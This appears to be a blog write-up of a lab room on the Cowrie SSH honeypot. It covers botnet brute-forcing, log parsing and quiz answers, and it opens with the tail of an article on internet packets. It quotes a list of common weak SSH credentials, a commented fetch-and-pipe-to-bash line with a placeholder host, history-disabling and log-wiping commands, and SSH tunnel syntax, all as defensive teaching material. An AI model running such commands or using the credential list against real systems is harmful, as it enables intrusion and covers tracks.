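    The reassembly step can be illustrated with a tiny shell simulation: three made-up "packets" arrive out of order, each tagged with a sequence number, and sorting by sequence number before concatenating the payloads recovers the original bit stream. The payloads here are invented for the example:

    ```shell
    # Each line is "sequence:payload"; the packets arrive out of order.
    printf '%s\n' '3:110010' '1:010101' '2:001100' \
      | sort -t: -k1,1n \
      | cut -d: -f2 \
      | tr -d '\n'
    # -> 010101001100110010
    echo
    ```

    Real transport protocols such as TCP do essentially this, plus the acknowledgement and retransmission of lost packets described above.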

     

     



    Similarly, on the internet we use something called protocols to manage this complex flow of data packets. Protocols set the rules for data packet conversion, the attachment of source and destination addresses to each packet, the rules for routers, and so on; different applications use different protocols. We hope this article has given you a good understanding of how the internet works, more specifically of the amazing journey of data packets from the data center to your mobile phone.






      - Hacking Truth by Kumar Atul Jaiswal



  • Introduction To Honeypots

     

     

    Introduction To Honeypots


     

     



    What are honeypots?


    A honeypot is a deliberately vulnerable security tool designed to attract attackers and record the actions of adversaries. Honeypots can be used in a defensive role to alert administrators of potential breaches and to distract attackers away from real infrastructure. Honeypots are also used to collect data on the tools and techniques of adversaries and assist with generating effective defensive measures.

    This room will demonstrate the Cowrie honeypot from the perspectives of an adversary and security researcher. This room will also highlight the data collected by a Cowrie honeypot deployment, some analysis methodologies, and what the gathered data tell us about typical botnet activity.




    Types of Honeypots


    Honeypot Interactivity and Classification

    A wide variety of honeypots exist, so it is helpful to classify them by the level of interactivity provided to adversaries, with most honeypots falling into one of the below categories:


    Low-Interaction honeypots offer little interactivity to the adversary and are only capable of emulating the functions required to present a service and capture attacks against it. Adversaries are not able to perform any post-exploitation activity against these honeypots as they are unable to fully exploit the simulated service. Examples of low-interaction honeypots include mailoney and dionaea.

    Medium-Interaction honeypots collect data by emulating both vulnerable services and the underlying OS, shell, and file systems. This allows adversaries to complete initial exploits and carry out post-exploitation activity. Note that, unlike high-interaction honeypots (see below), the system presented to adversaries is a simulation. As a result, it is usually not possible for adversaries to complete their full range of post-exploitation activity, as the simulation will be unable to function completely or accurately. We will be taking a look at the medium-interaction SSH honeypot Cowrie in this demo.

    High-Interaction honeypots are complete systems, usually virtual machines, that include deliberate vulnerabilities. Adversaries should be able (but not necessarily allowed) to perform any action against the honeypot as it is a complete system. It is important that high-interaction honeypots are carefully managed; otherwise, there is a risk that an adversary could use the honeypot as a foothold to attack other resources. Cowrie can also operate as an SSH proxy and management system for high-interaction honeypots.



    Deployment Location


    Once deployed, honeypots can then be further categorized by the exact location of their deployment:


    Internal honeypots are deployed inside a LAN. This type can act as a way to monitor a network for threats originating from the inside, for example, attacks originating from trusted personnel or attacks that bypass firewalls, like phishing attacks. Ideally, these honeypots should never be compromised, as a compromise would indicate a significant breach.

    External honeypots are deployed on the open internet and are used to monitor attacks from outside of the LAN. These honeypots are able to collect much more data on attacks since they are effectively guaranteed to be under attack at all times.






    The Cowrie SSH Honeypot


    The Cowrie honeypot can work either as an SSH proxy or as a simulated shell. The demo machine is running the simulated shell. You can log in using the following credentials:

        IP - 10.10.81.52
        User - root
        Password - <ANY>

    As you can see, the emulated shell is pretty convincing and could catch an unprepared adversary off guard. Most of the commands work as you'd expect, and the contents of the file system match what would be present on a clean Ubuntu 18.04 installation. However, there are ways to identify this type of Cowrie deployment. For example, it's not possible to execute bash scripts, as this is a limitation of low- and medium-interaction honeypots. It's also possible to identify a default installation, as it will mirror a Debian 5 installation and features a user account named Phil. The default file system also references an outdated CPU.

     




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ ssh root@10.10.81.52            
    The authenticity of host '10.10.81.52 (10.10.81.52)' can't be established.
    RSA key fingerprint is SHA256:tag6Ip0SU0wDGK1/QLA7FVFRhGHsHtMUqktyMyNOs3E.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '10.10.81.52' (RSA) to the list of known hosts.
    Ubuntu 18.04.5 LTS
    root@10.10.81.52's password: 
    
    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    root@acmeweb:~# whoami 
    root
    root@acmeweb:~# #www.kumaratuljaiswal.in
    
    
    





    Cowrie Logs


    Cowrie Event Logging
     

    The honeypot wouldn't be of much use without the ability to collect data on the attacks that it's subjected to. Fortunately, Cowrie uses an extensive logging system that tracks every connection and command handled by the system. You can access the real SSH port for this demo machine using the following options:

        IP - 10.10.81.52
        Port - 1400
        User - demo
        Password - demo


    Cowrie can log to a variety of local formats and log-parsing suites. In this case, the installation is just using the JSON and text logs. I've installed the JSON parser jq on the demo machine to simplify log parsing.
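    As a sketch of what parsing these logs looks like, the sample events below are made up, but the field names (eventid, src_ip, and so on) follow Cowrie's JSON log format:

    ```shell
    # Illustrative Cowrie-style JSON events (values invented for the example):
    cat > /tmp/cowrie-sample.json <<'EOF'
    {"eventid":"cowrie.login.failed","username":"root","password":"1234","src_ip":"198.51.100.7"}
    {"eventid":"cowrie.login.failed","username":"admin","password":"admin","src_ip":"203.0.113.9"}
    {"eventid":"cowrie.login.success","username":"root","password":"password","src_ip":"198.51.100.7"}
    EOF

    # Count failed login attempts, in the same grep | wc style used
    # elsewhere in this post:
    grep -c '"eventid":"cowrie.login.failed"' /tmp/cowrie-sample.json
    # -> 2

    # With jq installed you can ask richer questions, e.g. unique source IPs:
    # jq -r .src_ip /tmp/cowrie-sample.json | sort -u
    ```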


    Note: You may need to delete the demo machine's identity from .ssh/known_hosts as it will differ from the one used in the honeypot. You will also need to specify a port by adding -p 1400 to the SSH command. The logs can be found at /home/cowrie/honeypot/var/log/cowrie


    Log Aggregation


    The amount of data collected by honeypots, especially external deployments, can quickly grow past the point where manual parsing is practical. As a result, it's often worth deploying honeypots alongside a logging platform like the ELK stack. Log aggregation platforms can also provide live monitoring capabilities and alerts. This is particularly beneficial when deploying honeypots with the intent to respond to attacks rather than just to collect data.






     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ ssh demo@10.10.81.52 -p 1400    
    The authenticity of host '[10.10.81.52]:1400 ([10.10.81.52]:1400)' can't be established.
    ECDSA key fingerprint is SHA256:0CHR6APzGaV/dM1GonCR0T7wJ3nJpPQ7jym2/1E33HY.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '[10.10.81.52]:1400' (ECDSA) to the list of known hosts.
    demo@10.10.81.52's password: 
    Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-158-generic x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
      System information as of Mon Oct 11 04:04:00 UTC 2021
    
      System load:  0.18              Processes:           91
      Usage of /:   27.3% of 8.79GB   Users logged in:     0
      Memory usage: 41%               IP address for eth0: 10.10.81.52
      Swap usage:   0%
    
    
    0 updates can be applied immediately.
    
    
    
    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.
    
    
    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.
    
    demo@acmeweb:~$ whoami
    demo
    demo@acmeweb:~$ #www.hackingtruth.in
    demo@acmeweb:~$ 
     
      









    demo@acmeweb:~$ ls
    BotCommands  Top200Creds.txt  Tunnelling
    demo@acmeweb:~$ cat Top200Creds.txt
    /root/1234/
    /root/gm8182/
    /root/Admin123/
    /root/cisco/
    /pi/raspberry/
    /user/user/
    /root/abc123/
    /pi/raspberryraspberry993311/
    /user/1234/
    /root/test/
    /root/elite/
    /ftpadmin/ftpadmin/
    /default//
    /admin/11/
    demo@acmeweb:~$ 
    demo@acmeweb:~$ cd /home/cowrie/honeypot/var/log/cowrie
    demo@acmeweb:/home/cowrie/honeypot/var/log/cowrie$ ls
    audit.log  cowrie.json  cowrie.json.2021-09-23
    demo@acmeweb:/home/cowrie/honeypot/var/log/cowrie$ 
    
    
    



    Attacks Against SSH


    SSH and Brute-Force Attacks


    By default, Cowrie will only expose SSH. This means adversaries will only be able to compromise the honeypot by attacking the SSH service. The attack surface presented by a typical SSH installation is limited, so most attacks against the service take the form of brute-force attacks. Defending against these attacks is relatively simple in most cases, as they can be defeated by only allowing public-key authentication or by using strong passwords. These attacks should not be completely ignored, however: there are simply so many of them that you are pretty much guaranteed to be attacked at some point.
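    For reference, the mitigations mentioned above map onto a handful of OpenSSH server directives. This is a sketch, not a complete hardening guide:

    ```shell
    # Sketch of sshd_config changes that implement "public-key only"
    # authentication (OpenSSH; edit /etc/ssh/sshd_config):
    #
    #   PasswordAuthentication no          # refuse password logins entirely
    #   PubkeyAuthentication yes           # allow key-based logins
    #   PermitRootLogin prohibit-password  # root only via keys, if at all
    #
    # After editing, validate the config and reload the service:
    #   sshd -t && systemctl reload sshd
    ```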

    A collection of the 200 most common credentials used against old Cowrie deployments has been left on the demo machine and can be used to answer the questions below. As you can see, most of the passwords are extremely weak. Notable entries include the default credentials used for some devices like Raspberry Pis and the Volumio Jukebox. Various combinations of '1234' and rows of keys are also commonplace.



    1) How many passwords include the word "password" or some other variation of it, e.g. "p@ssw0rd"?

    HINT - This regular expression works "p.*ss.*". You can also count lines by piping to wc -l

    Ans - 15




    demo@acmeweb:~$ 
    demo@acmeweb:~$ ls
    BotCommands  Top200Creds.txt  Tunnelling
    demo@acmeweb:~$ 
    demo@acmeweb:~$ grep "p.*ss" Top200Creds.txt
    /admin/password/
    /root/password1/
    /root/password/
    /user1/password/
    /MikroTik/password/
    /default/password/
    /admin1/password/
    /profile1/password/
    /user/password/
    /admin/passw0rd/
    /admin1/passw0rd/
    /user1/passw0rd/
    /profile1/passw0rd/
    /MikroTik/passw0rd/
    /default/passw0rd/
    demo@acmeweb:~$ 
    demo@acmeweb:~$ 
    demo@acmeweb:~$ ls
    BotCommands  Top200Creds.txt  Tunnelling
    demo@acmeweb:~$ 
    demo@acmeweb:~$ grep "p.*ss" Top200Creds.txt | wc -l
    15
    demo@acmeweb:~$ 
    
    
    



    2) What is arguably the most common tool for brute-forcing SSH?

    Ans - hydra


    3) What intrusion prevention software framework is commonly used to mitigate SSH brute-force attacks?

    Ans - fail2ban






    Typical Bot Activity


    Typical Post Exploitation Activity


    The majority of attacks against typical SSH deployments are automated in some way. As a result, most of the post-exploitation activity that takes place after a bot gains initial access to the honeypot will follow a broad pattern. In general, most bots will perform a combination of the following:


    Perform some reconnaissance using the uname or nproc commands or by reading the contents of files like /etc/issue and /proc/cpuinfo. It's possible to change the contents of all these files so the honeypot can pretend to be a server or even an IoT toaster.

    Install malicious software by piping a remote shell script into bash. Often this is performed using wget or curl, though bots will occasionally use FTP. Cowrie will download each unique occurrence of a file but prevent the scripts from being executed. Most of the scripts tend to reference cryptocurrency mining in some way.

    A more limited number of bots will then perform some anti-forensics tasks by deleting various logs and disabling bash history. This doesn't affect Cowrie since all the actions are logged externally.

    Bots are not limited to these actions in any way and there is still some variation in the methods and goals of bots. Run through the questions below to further understand how adversaries typically perform reconnaissance against Linux systems.
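    The reconnaissance steps described above can be reproduced safely. The sketch below runs only harmless read-only commands and keeps the malicious stages as comments; the URL and file paths in the comments are placeholders, not real examples:

    ```shell
    # The recon portion of a typical bot session, using harmless
    # read-only commands (safe to run on a Linux host):
    uname -a                          # kernel version and architecture
    nproc                             # CPU core count -- used to size a miner
    cat /etc/issue 2>/dev/null        # distribution banner, if present
    head -5 /proc/cpuinfo 2>/dev/null # CPU model details

    # The later stages are shown as comments only -- do NOT run commands
    # like these from untrusted scripts:
    #   wget -O - http://<malicious-host>/setup.sh | bash   # install stage
    #   unset HISTFILE                                      # anti-forensics
    #   rm -f /var/log/wtmp                                 # log wiping
    ```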





    1) What CPU does the honeypot "use"?

    Ans -



    2) Does the honeypot return the correct values when uname -a is run? (Yay/Nay)

    Ans -



    3) What flag must be set to pipe wget output into bash?

    Ans - -O (set to "-", as in wget -O - <url> | bash, which writes the download to stdout)


    4) How would you disable bash history using unset?

    Ans - unset HISTFILE




     
     

    Identification Techniques


    Bot Identification


    It is possible to use the data recorded by Cowrie to identify individual bots. The factors that identify traffic from individual botnets are not always the same. However, some artifacts tend to be consistent across bots, including the IP addresses requested and the specific order of commands. Identifiable messages may also be present in scripts or commands, though this is uncommon. Some bots may also use highly identifiable public SSH keys to maintain persistence.


    It's also possible to identify bots from the scripts that are downloaded by the honeypot, using the same methods that would be used to identify other malware samples.


    Take a look at the samples included with the demo machine and answer the below questions.


    Note: Don't run any of the commands found in the samples as you may end up compromising whatever machine that runs them!






    1) What brand of device is the bot in the first sample searching for? (BotCommands/Sample1.txt)

    Ans -



    2) What are the commands in the second sample changing? (BotCommands/Sample2.txt)

    Ans -



    3) What is the name of the group that runs the botnet in the third sample? (BotCommands/Sample3.txt)

    Ans -




    SSH Tunnelling


    Attacks Performed Using SSH Tunnelling


    Some bots will not perform any actions directly against the honeypot and will instead leverage the compromised SSH deployment itself. This is accomplished with the use of SSH tunnels. In short, SSH tunnels forward network traffic between nodes via an encrypted tunnel. SSH tunnels can add an additional layer of secrecy when attacking other targets, as third parties are unable to see the contents of packets that are forwarded through the tunnel. Forwarding via SSH tunnels also allows an adversary to hide their true public IP in much the same way a VPN would.


    The IP obfuscation can then be used to facilitate schemes that require the use of multiple different public IP addresses, like SEO boosting and spamming. SSH tunnelling may also be used to bypass IP-based rate-limiting tools like Fail2Ban, as an adversary can switch to a different IP once they have been blocked.
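    For reference, the two common tunnel styles look like this on the command line. The host names here are placeholders, not real targets:

    ```shell
    # Local forward: traffic sent to localhost:8080 exits from the
    # compromised host towards target.example:80 -- the target sees the
    # compromised host's IP, not the attacker's:
    #   ssh -L 8080:target.example:80 user@<compromised-host>
    #
    # Dynamic forward: a SOCKS proxy on localhost:1080 that relays
    # traffic to arbitrary destinations through the compromised host:
    #   ssh -D 1080 user@<compromised-host>
    ```

    A Cowrie deployment records these forwarding requests without actually relaying them, which is what makes the tunnelling samples in this task possible.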




    SSH Tunnelling Data in Cowrie


    By default, Cowrie will record all of the SSH tunnelling requests received by the honeypot but will not forward them on to their destination. This data is of particular importance as it allows for the monitoring and discovery of web attacks that may not have been found by another honeypot. I've included a couple of samples of the sort of data that can be recorded from SSH tunnels.

    Note: Some elements have been redacted from the samples to protect vulnerable servers.





    1) What application is being targeted in the first sample? (Tunnelling/Sample1.txt)

    Ans -



    2) Is the URL in the second sample malicious? (Tunnelling/Sample2.txt) (Yay/Nay)

    Ans -








    Recap and Extra Resources


    Recap


    I hope this room has demonstrated how interesting honeypots can be and how the data that we can collect from them can be used to gain insight into the operations of botnets and other malicious actors.



    Extra Resources


    I've included some extra resources to assist in learning more about honeypots below:


        Awesome Honeypots - A curated list of honeypots
        Cowrie - The SSH honeypot used in the demo
        Sending Cowrie Output to ELK - A good example of how to implement live log monitoring
       

    I would also recommend that you deploy a honeypot yourself as it's a great way to learn. Deploying a honeypot is also a great way to understand how to work with cloud providers since external honeypots are best when deployed to the cloud. Deploying and managing multiple honeypots is also an interesting challenge and a good way to gain practical experience with tools like Ansible.








      - Hacking Truth by Kumar Atul Jaiswal




  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com
